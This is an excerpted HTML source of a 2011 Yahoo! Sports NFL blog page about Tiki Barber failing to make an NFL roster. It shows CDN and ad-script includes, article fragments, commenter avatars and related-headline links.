<link rel="stylesheet" type="text/css" media="print" href="http://l.yimg.com/j/assets/eJx1kO2KwyAQRZ8oSZP6SR9GrJm0gjrFMV3y9qspyyaw-0s491wujiMattUPU6_7y5CBoHQLpkLdI_uZ-jxKqYS4ueo5jBHTcLcElXPJuTxyZzOuBKF1hNbTMfvyc-uw6zSNR77Rq4s4_7xVUaPQ6j-lgI27w5j8y0lLWxej5p_1J0YwNVgD0N7j8vobBLAzFcybWcCWNX-cixZ6d7zDRKc18gXaT0yyb_OsbchmQSyQT5rNxbsAJ3YP-GiHUZLp2yv7VMwBM6mY-gYK3IZE.css?z&m" />
<script>
...[SNIP]...
</script>
<script charset="utf-8" src="http://l.yimg.com/j/assets/eJx9kOGOgyAQhJ9IRRSF3MOYLa6VVsAAXuPbH0gv8ZKzvyAz3yyzPHy1b6qipShJui0WRnSFVqZ0dd_zhn89zsho9bWJ32jCtS2tMSiDsuaaAaM0fEYe_n-3KZu8w9tk0WTJ9AhOzgN4r3yooqnydaCECMIpqbuGx0DbUFqnQCzqA5jgjydodzzhV-veSstEUhxODv18Tga4_SJdnmSfChPRc9YmZbYaB23HbcE_w4KST3RJ6RgjSXkpM9rXmfHSOgxzXr3rBU3iusCObshLnrs4WNWY_oHGfBK2JeT54vCnZbdbVnj9bqu1NdXu1yI2PM4R3AKJER1vL5jcwNiAhQYD97zGh8AEEm_xZyLG65bXF5hCUazKFMGBfCpzT1MJY_wH0NjgNg,,.js?z&m"></script>
...[SNIP]...
</script>

<script type="text/javascript" charset="utf-8" src="http://l.yimg.com/j/assets/eJx1kM0OgyAQhJ_IKqD8pA_TbIFULLCG1TT26av00F48bXbmy-xmJmoTZHj4cimsF5yz60SthYIr-fivuUA2Iq3F76pkqu8OldAGiLf7uiyYaXeUEYIfTvIuwBxhq9FKa9nXaEwJc7vR3CR0ddIIxTfL6BuyWOM1Gzg_oe3o7TPkg-oMFyfUHOyTapI0-oSJ8N4igvs-2LNBnp381TEobWodL4Tx2A038gO2NW8j.js?z&m"></script>
...[SNIP]...
<meta property="og:title" content="Tiki Barber remains unemployed and sad" />
<link rel="image_src" href="http://mit.zenfs.com/209/2011/09/TikiBag.jpg" />
<link rel="canonical" href="http://sports.yahoo.com/nfl/blog/shutdown_corner/post/Tiki-Barber-remains-unemployed-and-sad?urn=nfl-wp6443" />
...[SNIP]...
<meta name="msapplication-task" content="name=Photos;action-uri=http://sports.yahoo.com/nfl/gallery;icon-uri=http://sports.yahoo.com/favicon.ico" />

<link rel="stylesheet" type="text/css" href="http://l.yimg.com/zz/combo?d/lib/media/phugc/mwphcom_r141.css&d/lib/yui/2.9.0/build/container/assets/skins/sam/container.css&d/lib/yui/2.9.0/build/fonts/fonts-min.css&d/lib/yui/2.9.0/build/reset/reset-min.css" />
</head>
...[SNIP]...
<h2 id="yahoo-image-logo"><img src="http://l.yimg.com/a/i/us/sp/ysp-mod/yahoo-print-logo.png" alt="Yahoo! Sports" /></h2>
...[SNIP]...
<div id="ysp-hd">

<link type='text/css' rel='stylesheet' href='http://l.yimg.com/zz/combo?kx/ucs/uh/css/215/yunivhead-min.css&kx/ucs/uh/css/221/logo-min.css&kx/ucs/search/css/180/search_all-min.css&kx/ucs/search/css/170/search_buttons-min.css'/><style>
...[SNIP]...
</script><script id="load_wrapper" type="text/javascript" src="http://mi.adinterax.com/wrapper.js"></script>
...[SNIP]...
<!--Vendor: Factor TG, Format: Pixel, IO: 774106--><SCRIPT LANGUAGE="JavaScript" SRC="http://as1.suitesmart.com/99917/G15493.js?GID=15493"></SCRIPT>
...[SNIP]...
<a href="/nfl/blog/shutdown_corner" title="Shutdown Corner - NFL "><img src="http://l.yimg.com/a/i/us/sp/fn/ed/blog/rev/blogheader_shutdowncorner.jpg" alt="Shutdown Corner - NFL "></a>
...[SNIP]...
<p><img src="http://l.yimg.com/a/p/sp/editorial_image/ad/ad9eec7900e325e007145dabe8abc77a/tiki_barber_remains_unemployed_and_sad.jpg" width="270" /="/" align="right" src="http://mit.zenfs.com/209/2011/09/TikiBag.jpg" height="405" hspace="8" class="alignright size-full wp-image-6444" title="TikiBag" alt="Tiki Barber remains unemployed and sad">When Tiki Barber told HBO that <a href="http://sports.yahoo.com/nfl/blog/shutdown_corner/post/Tiki-Barber-8217-s-return-to-football-is-a-trea?urn=nfl-wp2735">
...[SNIP]...
<p>Now that NFL rosters are set at 53, and Tiki Barber never got to sniff one, I hope that's not true. <a href="http://sportsillustrated.cnn.com/2011/writers/peter_king/09/05/laborday/1.html">According to Peter King at Sports Illustrated, Tiki isn't taking it well</a>
...[SNIP]...
<p>Where this will leave Tiki Barber the person, I don't know. He's also <a href="http://www.huffingtonpost.com/2011/08/30/tiki-barber-traci-lynn-johnson-engaged_n_942415.html">recently proposed to his girlfriend</a>
...[SNIP]...
="http://us.lrd.yahoo.com/_ylc=X3oDMTF0YjliOWY5BHRtX2RtZWNoA1RleHQgTGluawR0bV9sbmsDVTExNzE1MTUEdG1fbmV0A1lhaG9vBHRtX3BvcwNjZW50ZXI-/SIG=11mhsvns4/**http%3A//football.fantasysports.yahoo.com/f1/signup"><img src="http://l.yimg.com/a/p/sp/tools/med/2011/09/ipt/1314989147.jpg" border="0" alt=""/></a>
...[SNIP]...
<br />
... <a href="http://yhoo.it/nxJyoy">Colts delay Jim Tressel's employment</a><br />
... <a href="http://yhoo.it/phyJNx">Video: The NFL's most critical offseason moves</a><br />
... <a href="http://yhoo.it/mSN2e5">High school wrestler's 9/11 tie to President Bush</a>
...[SNIP]...
<!--{ULT:BEGIN-SECTION;sec=foot-digg}-->
<a href="http://digg.com/submit?phase=2&url=http%3A%2F%2Fsports.yahoo.com%2Fnfl%2Fblog%2Fshutdown_corner%2Fpost%2FTiki-Barber-remains-unemployed-and-sad%3Furn%3Dnfl-wp6443&title=Tiki+Barber+remains+unemployed+and+sad&ts=1315313084" class="digg" title="Digg.com" target="_new"><strong>
...[SNIP]...
<!--{ULT:BEGIN-SECTION;sec=foot-facebook}-->
<a href="http://www.facebook.com/sharer.php?u=http%3A%2F%2Fsports.yahoo.com%2Fnfl%2Fblog%2Fshutdown_corner%2Fpost%2FTiki-Barber-remains-unemployed-and-sad%3Furn%3Dnfl-wp6443&title=Tiki+Barber+remains+unemployed+and+sad&ts=1315313084" class="facebook" title="Facebook" target="_new"><strong>
...[SNIP]...
<!--{ULT:BEGIN-SECTION;sec=foot-twitter}-->
<a href="http://twitter.com/home?status=http%3A%2F%2Fsports.yahoo.com%2Fnfl%2Fblog%2Fshutdown_corner%2Fpost%2FTiki-Barber-remains-unemployed-and-sad%3Furn%3Dnfl-wp6443" class="twitter" title="Twitter" target="_new"><strong>
...[SNIP]...
81/L=0QKTVmKIPE7pARpjTl.wjQLGMhd7ak5mFbkACuv1/B=6SzPKdj8fcA-/J=1315313081873363/K=dHuXEgTLQ4cGOnShgI49sw/A=6418146/R=0/SIG=11j13n4o5/*http://football.fantasysports.yahoo.com/f1/signup" target="_blank"><img src="http://ads.yimg.com/a/a/ya/yahoo_sports8/yahoo!_fantasy_football11_smb_630x31.jpg" alt="click here" width="630" height="31" border="0"></a>
...[SNIP]...
<a href="http://pulse.yahoo.com/_OA3RIOXRBGNLY2AQTW2YKVOOLI">

<img id="com_14641504_OA3RIOXRBGNLY2AQTW2YKVOOLI" class="imageloader_classname" width="48" height="48" alt="whitey" src="http://l.yimg.com/a/i/us/nws/2008/news/us/assets/common/images/transparent.png" style="background:url(http://l.yimg.com/a/i/identity2/profile_48a.png);"></a>
...[SNIP]...
<a href="http://pulse.yahoo.com/_ZGAAUPA4UQ74QYKQM4FCHVUJ2Q">

<img id="com_14641496_ZGAAUPA4UQ74QYKQM4FCHVUJ2Q" class="imageloader_classname" width="48" height="48" alt="mcman44" src="http://l.yimg.com/a/i/us/nws/2008/news/us/assets/common/images/transparent.png" style="background:url(http://l.yimg.com/a/i/identity2/profile_48b.png);"></a>
...[SNIP]...
<a href="http://pulse.yahoo.com/_FTLQMXZ2XX7F44ZPMMQOHWWURA">

<img id="com_14641490_FTLQMXZ2XX7F44ZPMMQOHWWURA" class="imageloader_classname" width="48" height="48" alt="JOEK" src="http://l.yimg.com/a/i/us/nws/2008/news/us/assets/common/images/transparent.png" style="background:url(http://l.yimg.com/a/i/identity2/profile_48e.png);"></a>
...[SNIP]...
<a href="http://pulse.yahoo.com/_3XCD7V2IBRT43HCIJKHNWX4SZI">

<img id="com_14641475_3XCD7V2IBRT43HCIJKHNWX4SZI" class="imageloader_classname" width="48" height="48" alt="concerned citizen" src="http://l.yimg.com/a/i/us/nws/2008/news/us/assets/common/images/transparent.png" style="background:url(http://l.yimg.com/a/i/identity2/profile_48d.png);"></a>
...[SNIP]...
<a href="http://pulse.yahoo.com/_LIMI7M6SXLQ42FGCL5XIGPOHOI">

<img id="com_14641471_LIMI7M6SXLQ42FGCL5XIGPOHOI" class="imageloader_classname" width="48" height="48" alt="Shelby" src="http://l.yimg.com/a/i/us/nws/2008/news/us/assets/common/images/transparent.png" style="background:url(http://l.yimg.com/a/i/identity2/profile_48d.png);"></a>
...[SNIP]...
<a href="http://pulse.yahoo.com/_33CGMYSFB4K5BQKR3QB23X7DSI">

<img id="com_14641464_33CGMYSFB4K5BQKR3QB23X7DSI" class="imageloader_classname" width="48" height="48" alt="Bruce" src="http://l.yimg.com/a/i/us/nws/2008/news/us/assets/common/images/transparent.png" style="background:url(http://l.yimg.com/a/i/identity2/profile_48b.png);"></a>
...[SNIP]...
<a href="http://pulse.yahoo.com/_IZRO2VV6RFWS7INK2VIVWBS46M">

<img id="com_14641463_IZRO2VV6RFWS7INK2VIVWBS46M" class="imageloader_classname" width="48" height="48" alt="thatgirl" src="http://l.yimg.com/a/i/us/nws/2008/news/us/assets/common/images/transparent.png" style="background:url(http://avatars.zenfs.com/users/1AxKBKy6NAAEB-IFDFFA=.medium.png);"></a>
...[SNIP]...
<a href="http://pulse.yahoo.com/_2DW3OMNCFZWIQQDTZ6AXB7AYWM">

<img id="com_14641458_2DW3OMNCFZWIQQDTZ6AXB7AYWM" class="imageloader_classname" width="48" height="48" alt="DICKENS" src="http://l.yimg.com/a/i/us/nws/2008/news/us/assets/common/images/transparent.png" style="background:url(http://l.yimg.com/a/i/identity2/profile_48d.png);"></a>
...[SNIP]...
<a href="http://pulse.yahoo.com/_IZRO2VV6RFWS7INK2VIVWBS46M">

<img id="com_14641450_IZRO2VV6RFWS7INK2VIVWBS46M" class="imageloader_classname" width="48" height="48" alt="thatgirl" src="http://l.yimg.com/a/i/us/nws/2008/news/us/assets/common/images/transparent.png" style="background:url(http://avatars.zenfs.com/users/1AxKBKy6NAAEB-IFDFFA=.medium.png);"></a>
...[SNIP]...
<a href="http://pulse.yahoo.com/_VICKDI7FNMKYQ3QZZBP6HK6XTA">

<img id="com_14641448_VICKDI7FNMKYQ3QZZBP6HK6XTA" class="imageloader_classname" width="48" height="48" alt="Felix" src="http://l.yimg.com/a/i/us/nws/2008/news/us/assets/common/images/transparent.png" style="background:url(http://a323.yahoofs.com/coreid/49bb55e9i2197z/oRJR4kQ3c6RdFBJIcqizfmISUPs-/100/tn48.jpg?ciAa60QBO4C663dh);"></a>
...[SNIP]...
<a href="http://pulse.yahoo.com/_OLUNPBS7ETLZEMC4POMRFP2PPY">

<img id="com_14641444_OLUNPBS7ETLZEMC4POMRFP2PPY" class="imageloader_classname" width="48" height="48" alt="Dan Kraybill" src="http://l.yimg.com/a/i/us/nws/2008/news/us/assets/common/images/transparent.png" style="background:url(http://a323.yahoofs.com/coreid/4c863964i912zul1re3/P6o2Zjs1eqiIcvvUrj0pF4b9HA--/2/tn48.jpg?ciAa60QBqrxsP3u8);"></a>
...[SNIP]...
<a href="http://pulse.yahoo.com/_6BDMBV63PK4OVIMAUYEQBEKQQI">

<img id="com_14641443_6BDMBV63PK4OVIMAUYEQBEKQQI" class="imageloader_classname" width="48" height="48" alt="RollOn2012ObamasOut" src="http://l.yimg.com/a/i/us/nws/2008/news/us/assets/common/images/transparent.png" style="background:url(http://l.yimg.com/a/i/identity2/profile_48b.png);"></a>
...[SNIP]...
<a href="http://pulse.yahoo.com/_YVZTVM2UTKHMMSVGWCFFKYJOMQ">

<img id="com_14641428_YVZTVM2UTKHMMSVGWCFFKYJOMQ" class="imageloader_classname" width="48" height="48" alt="Randy" src="http://l.yimg.com/a/i/us/nws/2008/news/us/assets/common/images/transparent.png" style="background:url(http://a323.yahoofs.com/coreid/4d0bb75fi42dzws105mud/wPKJsyAzbqB_yRiR0Oierg--/1/tn48.jpeg?ciAa60QBss8CKkPn);"></a>
...[SNIP]...
<a href="http://pulse.yahoo.com/_LBQQJENEWI7EGQJ7YZIEWFK34Y">

<img id="com_14641413_LBQQJENEWI7EGQJ7YZIEWFK34Y" class="imageloader_classname" width="48" height="48" alt="Russ" src="http://l.yimg.com/a/i/us/nws/2008/news/us/assets/common/images/transparent.png" style="background:url(http://l.yimg.com/a/i/identity2/profile_48b.png);"></a>
...[SNIP]...
<a href="http://pulse.yahoo.com/_YKANDFIPI6ZJ3BHNKN4X4UV7GA">

<img id="com_14641407_YKANDFIPI6ZJ3BHNKN4X4UV7GA" class="imageloader_classname" width="48" height="48" alt="Bert" src="http://l.yimg.com/a/i/us/nws/2008/news/us/assets/common/images/transparent.png" style="background:url(http://a323.yahoofs.com/coreid/49bb6918if4az/bU1fIok3frQKtlLeu_Pmyw--/101/tn48.jpg?ciAa60QBeXVYnGD5);"></a>
...[SNIP]...
<a href="http://pulse.yahoo.com/_VNOFMKX3YQX6UWKYUQNH7Q2A3Y">

<img id="com_14641400_VNOFMKX3YQX6UWKYUQNH7Q2A3Y" class="imageloader_classname" width="48" height="48" alt="NeilD" src="http://l.yimg.com/a/i/us/nws/2008/news/us/assets/common/images/transparent.png" style="background:url(http://l.yimg.com/a/i/identity2/profile_48d.png);"></a>
...[SNIP]...
<a href="http://pulse.yahoo.com/_6UTWJJBRCWSD6L2GW6LKQBVCLU">

<img id="com_14641399_6UTWJJBRCWSD6L2GW6LKQBVCLU" class="imageloader_classname" width="48" height="48" alt="Bud" src="http://l.yimg.com/a/i/us/nws/2008/news/us/assets/common/images/transparent.png" style="background:url(http://l.yimg.com/a/i/identity2/profile_48a.png);"></a>
...[SNIP]...
<a href="http://pulse.yahoo.com/_VKH2NYGWOZAEWZRDXNTRU2NROE">

<img id="com_14641393_VKH2NYGWOZAEWZRDXNTRU2NROE" class="imageloader_classname" width="48" height="48" alt="Cherry Bear" src="http://l.yimg.com/a/i/us/nws/2008/news/us/assets/common/images/transparent.png" style="background:url(http://avatars.zenfs.com/users/13IW8dv7DAAECPiE_cIpQBl8B.medium.png);"></a>
...[SNIP]...
<a href="http://pulse.yahoo.com/_CYAD7NHXP5RNOOAOUVF3W7YARY">

<img id="com_14641378_CYAD7NHXP5RNOOAOUVF3W7YARY" class="imageloader_classname" width="48" height="48" alt="Starcaster" src="http://l.yimg.com/a/i/us/nws/2008/news/us/assets/common/images/transparent.png" style="background:url(http://avatars.zenfs.com/users/1jKNS1qBGAAECkcmcLb7TCA==.medium.png);"></a>
...[SNIP]...
<a href="http://pulse.yahoo.com/_BKMWFVLSFHWQPIAR2WS7ZQVOV4">

<img id="com_14641370_BKMWFVLSFHWQPIAR2WS7ZQVOV4" class="imageloader_classname" width="48" height="48" alt="Greg" src="http://l.yimg.com/a/i/us/nws/2008/news/us/assets/common/images/transparent.png" style="background:url(http://avatars.zenfs.com/users/1_z0fe50oAAEC2eT6KCAuBA==.medium.png);"></a>
...[SNIP]...
<a href="http://pulse.yahoo.com/_ZR75SZTAKTX7ICZVKNZ6ZPCHPQ">

<img id="com_14641369_ZR75SZTAKTX7ICZVKNZ6ZPCHPQ" class="imageloader_classname" width="48" height="48" alt="Mr Zox" src="http://l.yimg.com/a/i/us/nws/2008/news/us/assets/common/images/transparent.png" style="background:url(http://l.yimg.com/a/i/identity2/profile_48c.png);"></a>
...[SNIP]...
<a href="http://pulse.yahoo.com/_G2LWBYJFFIRFHKYTHNXS4QEJKY">

<img id="com_14641366_G2LWBYJFFIRFHKYTHNXS4QEJKY" class="imageloader_classname" width="48" height="48" alt="" src="http://l.yimg.com/a/i/us/nws/2008/news/us/assets/common/images/transparent.png" style="background:url(http://a323.yahoofs.com/coreid/4c8ad496idb7zul2re3/cqg5RoE8erDAhvZCVf73KhhwEqQ-/9/tn48.jpg?ciAa60QB0X1WZnq0);"></a>
...[SNIP]...
<a href="http://pulse.yahoo.com/_TRZACYYXQX5Y2O24PMFQZ4YJEQ">

<img id="com_14641363_TRZACYYXQX5Y2O24PMFQZ4YJEQ" class="imageloader_classname" width="48" height="48" alt="Victor" src="http://l.yimg.com/a/i/us/nws/2008/news/us/assets/common/images/transparent.png" style="background:url(http://l.yimg.com/a/i/identity2/profile_48c.png);"></a>
...[SNIP]...
<a href="http://pulse.yahoo.com/_KFR7CSJMD23L6SUBPBABCEZLUU">

<img id="com_14641362_KFR7CSJMD23L6SUBPBABCEZLUU" class="imageloader_classname" width="48" height="48" alt="Dave" src="http://l.yimg.com/a/i/us/nws/2008/news/us/assets/common/images/transparent.png" style="background:url(http://a323.yahoofs.com/coreid/4cc87ca7i1b79zws133ac4/Tn_rkFo1erBUVIO0bdyNXIK0spwP/1/tn48.jpeg?ciAa60QBKdrswYJk);"></a>
...[SNIP]...
<a href="http://pulse.yahoo.com/_7CJUUBMQFZ3O6MCEHGOEKQLT5I">

<img id="com_14641361_7CJUUBMQFZ3O6MCEHGOEKQLT5I" class="imageloader_classname" width="48" height="48" alt="Of the domain of the only known" src="http://l.yimg.com/a/i/us/nws/2008/news/us/assets/common/images/transparent.png" style="background:url(http://l.yimg.com/a/i/identity2/profile_48c.png);"></a>
...[SNIP]...
<div id="lrec" class="mod">
<IFRAME FRAMEBORDER=0 MARGINWIDTH=0 MARGINHEIGHT=0 SCROLLING=NO WIDTH=300 HEIGHT=250 SRC="http://ad.yieldmanager.com/st?_PVID=0QKTVmKIPE7pARpjTl.wjQLGMhd7ak5mFbkACuv1&ad_type=iframe&ad_size=300x250&site=140509&section_code=14445125&cb=1315313081873363&yud=zip%3D%26ycg%3D%26yyob%3D&pub_redirect_unencoded=1&pub_redirect=http://global.ard.yahoo.com/SIG=15rvjh3a9/M=787833.14445125.14291892.1806201/D=sports/S=2022092242:LREC/_ylt=AuXImj6wykRaku7iPAhaBYTSrYZ4/Y=YAHOO/EXP=1315320281/L=0QKTVmKIPE7pARpjTl.wjQLGMhd7ak5mFbkACuv1/B=zyzPKdj8fcA-/J=1315313081873363/K=dHuXEgTLQ4cGOnShgI49sw/A=6261244/R=0/*"></IFRAME>
...[SNIP]...
"http://sports.yahoo.com/nfl/news?slug=jc-cole_peyton_manning_colts_lockout090511&active_dimension=carousel_coke_today&ysp_frm_woah=1" title="Troubling health news for Peyton Manning">
<img src="http://l.yimg.com/iu/api/res/1.2/Dx8ad3BF8vfI6ktnGQZ2Pw--/YXBwaWQ9eXZpZGVvO2NoPTEyMDtjcj0xO2N3PTE4MDtkeD0xO2R5PTE7Zmk9dWxjcm9wO2g9NjM7cT0xMDA7dz05NA--/http://l.yimg.com/a/p/sp/tools/med/2011/09/ipt/1315252981.jpg" title="Troubling health news for Peyton Manning" alt="Troubling health news for Peyton Manning" width="94" height="63">
</a>
...[SNIP]...
<a href="http://sports.yahoo.com/nfl/news?slug=ap-buddyryan-cancer&active_dimension=carousel_coke_today&ysp_frm_woah=1" title="Cancer won't stop Ryan">
<img src="http://l.yimg.com/a/i/us/sp/ysp-mod/yahoo-article-thumb.png" alt="Yahoo! Sports"/>
</a>
...[SNIP]...
.com/nfl/blog/shutdown_corner/post/Shanahan-names-Rex-Grossman-Redskins-8217-Week?urn=nfl-wp6463&active_dimension=carousel_coke_today&ysp_frm_woah=1" title="Redskins name starting QB">
<img src="http://l.yimg.com/a/i/us/sp/ysp-mod/yahoo-article-thumb.png" alt="Yahoo! Sports"/>
</a>
...[SNIP]...
oo.com/nfl/blog/shutdown_corner/post/Aaron-Rodgers-8217-handlebar-mustache-gives-hi?urn=nfl-wp6423&active_dimension=carousel_coke_today&ysp_frm_woah=1" title="QB's impressive 'stache">
<img src="http://l.yimg.com/a/i/us/sp/ysp-mod/yahoo-article-thumb.png" alt="Yahoo! Sports"/>
</a>
...[SNIP]...
/big_league_stew/post/Jerome-Williams-The-Giants-called-me-8216-Jer?urn=mlb-wp18625&active_dimension=carousel_coke_today&ysp_frm_woah=1" title="MLB player called wrong name for years">
<img src="http://l.yimg.com/iu/api/res/1.2/bL85hQglN3ttKnNb7aMbGA--/YXBwaWQ9eXZpZGVvO2NoPTE1NDtjcj0xO2N3PTIyOTtkeD04MjtkeT0xO2ZpPXVsY3JvcDtoPTYzO3E9MTAwO3c9OTQ-/http://l.yimg.com/a/i/ww/news/2011/08/12/williams-pd.jpg" title="MLB player called wrong name for years" alt="MLB player called wrong name for years" width="94" height="63">
</a>
...[SNIP]...
.com/mlb/blog/big_league_stew/post/Blue-Jays-scout-Japan-8217-s-Yu-Darvish-Is-he-?urn=mlb-wp18464&active_dimension=carousel_coke_today&ysp_frm_woah=1" title="Japanese pitching phenom">
<img src="http://l.yimg.com/a/i/us/sp/ysp-mod/yahoo-article-thumb.png" alt="Yahoo! Sports"/>
</a>
...[SNIP]...
<a href="http://sports.yahoo.com/mlb/news?slug=jp-passan_10_degrees_mvp_candidates_090411&active_dimension=carousel_coke_today&ysp_frm_woah=1" title="Comparing potential MVPs">
<img src="http://l.yimg.com/iu/api/res/1.2/.VekwHIL.XxGYmrIR79ckQ--/YXBwaWQ9eXZpZGVvO2NoPTE2MDtjcj0xO2N3PTI0MDtkeD0xO2R5PTE7Zmk9dWxjcm9wO2g9NjM7cT0xMDA7dz05NA--/http://l.yimg.com/a/p/sp/tools/med/2011/09/ipt/1315203022.jpg" title="Comparing potential MVPs" alt="Comparing potential MVPs" width="94" height="63">
</a>
...[SNIP]...
<a href="http://sports.yahoo.com/nfl/news?slug=ap-colts-manning&active_dimension=carousel_coke_today&ysp_frm_woah=1" title="Tough news for Peyton">
<img src="http://l.yimg.com/iu/api/res/1.2/4gYbQm9TOj0foLKTK6kJxw--/YXBwaWQ9eXZpZGVvO2NoPTE0Nztjcj0xO2N3PTIyMDtkeD0xO2R5PTE7Zmk9dWxjcm9wO2g9NjM7cT0xMDA7dz05NA--/http://l.yimg.com/a/p/sp/tools/med/2011/08/ipt/1314681169.jpg" title="Tough news for Peyton" alt="Tough news for Peyton" width="94" height="63">
</a>
...[SNIP]...
utdown_corner/post/Colts-delay-Tressel-8217-s-employment-until-sev?urn=nfl-wp6446&active_dimension=carousel_coke_today&ysp_frm_woah=1" title="Jim Tressel punished by his new NFL boss">
<img src="http://l.yimg.com/iu/api/res/1.2/tcsbrnHu2XoIp0S0.Ckzsw--/YXBwaWQ9eXZpZGVvO2NoPTE1NDtjcj0xO2N3PTIyOTtkeD04MjtkeT0xO2ZpPXVsY3JvcDtoPTYzO3E9MTAwO3c9OTQ-/http://l.yimg.com/a/i/ww/news/2011/08/12/tressel-pd.jpg" title="Jim Tressel punished by his new NFL boss" alt="Jim Tressel punished by his new NFL boss" width="94" height="63">
</a>
...[SNIP]...
ahoo.com/mlb/blog/big_league_stew/post/Pitcher-Milone-hits-home-run-on-first-pitch-he-s?urn=mlb-wp18507&active_dimension=carousel_coke_today&ysp_frm_woah=1" title="Rookie's rare feat">
<img src="http://l.yimg.com/iu/api/res/1.2/jpYINf57Jv1vBnQgFernXw--/YXBwaWQ9eXZpZGVvO2NoPTE1NDtjcj0xO2N3PTIyOTtkeD04MjtkeT0xO2ZpPXVsY3JvcDtoPTYzO3E9MTAwO3c9OTQ-/http://l.yimg.com/a/i/ww/news/2011/08/12/troop-pd.jpg" title="Rookie's rare feat" alt="Rookie's rare feat" width="94" height="63">
</a>
...[SNIP]...
o.com/mlb/blog/big_league_stew/post/Umpire-West-goes-rogue-on-replay-in-Phillies-Mar?urn=mlb-wp18578&active_dimension=carousel_coke_today&ysp_frm_woah=1" title="Umpire's strange call">
<img src="http://l.yimg.com/a/i/us/sp/ysp-mod/yahoo-article-thumb.png" alt="Yahoo! Sports"/>
</a>
...[SNIP]...
.com/mlb/blog/big_league_stew/post/Brewers-backup-catcher-George-Kottaras-hits-firs?urn=mlb-wp18532&active_dimension=carousel_coke_today&ysp_frm_woah=1" title="Catcher hits for cycle">
<img src="http://l.yimg.com/a/i/us/sp/ysp-mod/yahoo-article-thumb.png" alt="Yahoo! Sports"/>
</a>
...[SNIP]...
<a href="http://sports.yahoo.com/nascar/news?slug=ap-nascar-atlanta&active_dimension=carousel_coke_today&ysp_frm_woah=1" title="NASCAR hopes bad weather gone by Tuesday">
<img src="http://l.yimg.com/iu/api/res/1.2/fY0ArNmEgARdXgW3VFOLkw--/YXBwaWQ9eXZpZGVvO2NoPTE1NDtjcj0xO2N3PTIyOTtkeD04MjtkeT0xO2ZpPXVsY3JvcDtoPTYzO3E9MTAwO3c9OTQ-/http://l.yimg.com/a/i/ww/news/2011/09/04/crash1.jpg" title="NASCAR hopes bad weather gone by Tuesday" alt="NASCAR hopes bad weather gone by Tuesday" width="94" height="63">
</a>
...[SNIP]...
<a href="http://sports.yahoo.com/nascar/news?slug=txnascarnationwide&active_dimension=carousel_coke_today&ysp_frm_woah=1" title="Edwards recovers, wins">
<img src="http://l.yimg.com/iu/api/res/1.2/KLKYfKOxh3ZdcnMCT15hfw--/YXBwaWQ9eXZpZGVvO2NoPTQyNTtjcj0xO2N3PTYzNDtkeD0xNDtkeT0xO2ZpPXVsY3JvcDtoPTYzO3E9MTAwO3c9OTQ-/http://d.yimg.com/a/p/sp/getty/b1/fullj.74236e574d6a4f7fa42887a424e4ecaf/74236e574d6a4f7fa42887a424e4ecaf-getty-107745401js007_11th_annual_.jpg" title="Edwards recovers, wins" alt="Edwards recovers, wins" width="94" height="63">
</a>
...[SNIP]...
post/Rafael-Nadal-collapses-at-post-match-press-confe?urn=ten-wp2948&active_dimension=carousel_coke_today&ysp_frm_woah=1" title="Rafael Nadal collapses at post-match press conference">
<img src="http://l.yimg.com/iu/api/res/1.2/p8QNXBH2ur9RxK3SSsdbug--/YXBwaWQ9eXZpZGVvO2NoPTE1NDtjcj0xO2N3PTIyOTtkeD04MjtkeT0xO2ZpPXVsY3JvcDtoPTYzO3E9MTAwO3c9OTQ-/http://l.yimg.com/a/i/ww/news/2011/09/04/nadal.jpg" title="Rafael Nadal collapses at post-match press conference" alt="Rafael Nadal collapses at post-match press conference" width="94" height="63">
</a>
...[SNIP]...
<a href="http://sports.yahoo.com/ten/news?slug=afp-tennis_usa_open_venuswilliams_20110904&active_dimension=carousel_coke_today&ysp_frm_woah=1" title="Venus thanks fans">
<img src="http://l.yimg.com/iu/api/res/1.2/SGDXAA_VYFh5N_Ix_DfK.g--/YXBwaWQ9eXZpZGVvO2NoPTE2NDtjcj0xO2N3PTI0NTtkeD0xO2R5PTE7Zmk9dWxjcm9wO2g9NjM7cT0xMDA7dz05NA--/http://d.yimg.com/a/p/sp/ac/cf/fullj.e6fc1b4cfaefc628237dd6812cc3d4a6/0.jpg" title="Venus thanks fans" alt="Venus thanks fans" width="94" height="63">
</a>
...[SNIP]...
<a href="http://sports.yahoo.com/ten/news?slug=afp-tennis_usa_open_men_20110904&active_dimension=carousel_coke_today&ysp_frm_woah=1" title="Nadal in field of 16">
<img src="http://l.yimg.com/iu/api/res/1.2/rk8mzTCWVKirKboIUyXTDg--/YXBwaWQ9eXZpZGVvO2NoPTE2NDtjcj0xO2N3PTI0NTtkeD0xO2R5PTE7Zmk9dWxjcm9wO2g9NjM7cT0xMDA7dz05NA--/http://d.yimg.com/a/p/sp/ac/cf/fullj.d830959be5676770fcf36656ad0b01f5/0.jpg" title="Nadal in field of 16" alt="Nadal in field of 16" width="94" height="63">
</a>
...[SNIP]...
<a href="http://sports.yahoo.com/ten/news?slug=ap-usopen-roddick&active_dimension=carousel_coke_today&ysp_frm_woah=1" title="Roddick looks strong">
<img src="http://l.yimg.com/iu/api/res/1.2/hTuM.plFCT5s1M65gp6zww--/YXBwaWQ9eXZpZGVvO2NoPTE0Nztjcj0xO2N3PTIyMDtkeD0xO2R5PTE7Zmk9dWxjcm9wO2g9NjM7cT0xMDA7dz05NA--/http://l.yimg.com/a/p/sp/tools/med/2011/08/ipt/1314857213.jpg" title="Roddick looks strong" alt="Roddick looks strong" width="94" height="63">
</a>
...[SNIP]...
log/shutdown_corner/post/Former-Pats-safety-Brandon-Meriweather-leads-lis?urn=nfl-wp6406&active_dimension=carousel_coke_today&ysp_frm_woah=1" title="Prominent NFL players on the move">
<img src="http://l.yimg.com/iu/api/res/1.2/PXuMXOwJ2uaXo5fYsMtxbQ--/YXBwaWQ9eXZpZGVvO2NoPTE1NDtjcj0xO2N3PTIyOTtkeD04MjtkeT0xO2ZpPXVsY3JvcDtoPTYzO3E9MTAwO3c9OTQ-/http://l.yimg.com/a/i/ww/news/2011/09/04/cuts.jpg" title="Prominent NFL players on the move" alt="Prominent NFL players on the move" width="94" height="63">
</a>
...[SNIP]...
<a href="http://sports.yahoo.com/nfl/news?slug=pfw-20110904_nfc_free_agent_moves_by_team_2&active_dimension=carousel_coke_today&ysp_frm_woah=1" title="Free agent moves">
